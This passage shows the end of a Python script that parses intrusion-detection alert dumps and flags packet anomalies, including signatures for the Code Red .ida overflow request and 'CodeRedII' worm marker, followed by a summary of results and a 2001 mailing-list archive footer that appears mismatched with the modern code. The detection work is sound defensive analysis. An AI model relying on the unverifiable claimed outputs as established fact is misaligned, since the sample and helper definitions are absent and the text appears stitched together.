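def parse_dump(text):
    """Return a list of alert dicts: header fields in 'kv', payload as bytes."""
    packets, cur = [], None
    for raw in text.splitlines():
        line = raw.strip()
        m = TITLE_RE.match(line)
        if m:
            cur = {"alert_id": int(m.group(1)), "time": m.group(2),
                   "name": m.group(3).strip(), "kv": {}, "payload": bytearray()}
            packets.append(cur)
        elif cur is None:
            continue
        elif line.startswith("IPv4:"):
            cur["src"], cur["dst"] = re.findall(r"\d+\.\d+\.\d+\.\d+", line)
        elif line.startswith("Payload:"):
            cur["payload_len"] = int(re.search(r"length\s*=\s*(\d+)", line).group(1))
        elif HEX_RE.match(line):
            # the hex column is separated from the ASCII column by three spaces
            hexpart = HEX_RE.match(line).group(2).split("   ", 1)[0]
            cur["payload"] += bytes.fromhex(hexpart)
        else:
            # IP and TCP header lines; the TCP flags=... overwrites the IP flags=0
            cur["kv"].update(KV_RE.findall(line))
    return packets


def check_packet(p):
    """Flag the per-packet oddities listed in the post (True = anomaly seen)."""
    kv, plen, data = p["kv"], p["payload_len"], bytes(p["payload"])
    hdrs = int(kv["hlen"]) * 4 + int(kv["off"]) * 4   # IP + TCP header bytes
    return {
        "ip_len_mismatch": int(kv["dlen"]) != hdrs + plen,  # dlen vs headers+payload
        "win_is_10x_len": int(kv["win"]) == 10 * plen,
        "seq_equals_ack": int(kv["seq"]) == int(kv["ack"]),
        "ip_id_zero": int(kv["ID"]) == 0,
        "ida_request": data.startswith(b"GET /default.ida"),
        "percent_u_encoding": b"%u" in data,       # the encoded .ida overflow request
        "coderedii_marker": b"CodeRedII" in data,  # string carried in the worm body
        "truncated_capture": len(data) < plen,
    }


def series_summary(packets):
    """Group alerts by (src, sport) and list the TTL/TOS values each series used."""
    groups = defaultdict(list)
    for p in packets:
        groups[(p["src"], int(p["kv"]["port"]))].append(p)
    return {k: {"alerts": [p["alert_id"] for p in ps],
                "ttl": sorted({int(p["kv"]["TTL"]) for p in ps}),
                "tos": sorted({int(p["kv"]["TOS"]) for p in ps})}
            for k, ps in groups.items()}


def triage(text=SAMPLE):
    packets = parse_dump(text)
    return {p["alert_id"]: check_packet(p) for p in packets}, series_summary(packets)


if __name__ == "__main__":
    findings, series = triage()
    for alert_id, f in findings.items():
        print(alert_id, [name for name, hit in f.items() if hit])
    print(series)
```

Run against the sample, alert 8922 comes back with only `win_is_10x_len`, `ida_request`, `percent_u_encoding` and `truncated_capture` set, alert 8924 with `ip_len_mismatch`, `seq_equals_ack`, `ip_id_zero` and `ida_request` but no `%u` encoding (its request line has NUL bytes where the `%u` escapes sit), and alert 8926 with the `CodeRedII` marker; the series summary shows both TTL values (124, 255) and both TOS values (0, 16) on the single source port 1894. Feeding the script the full dumps instead of the trimmed sample clears `truncated_capture` and leaves the other findings unchanged.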
    



    This archive was generated by hypermail 2b30 : Mon Aug 06 2001 - 11:25:27 PDT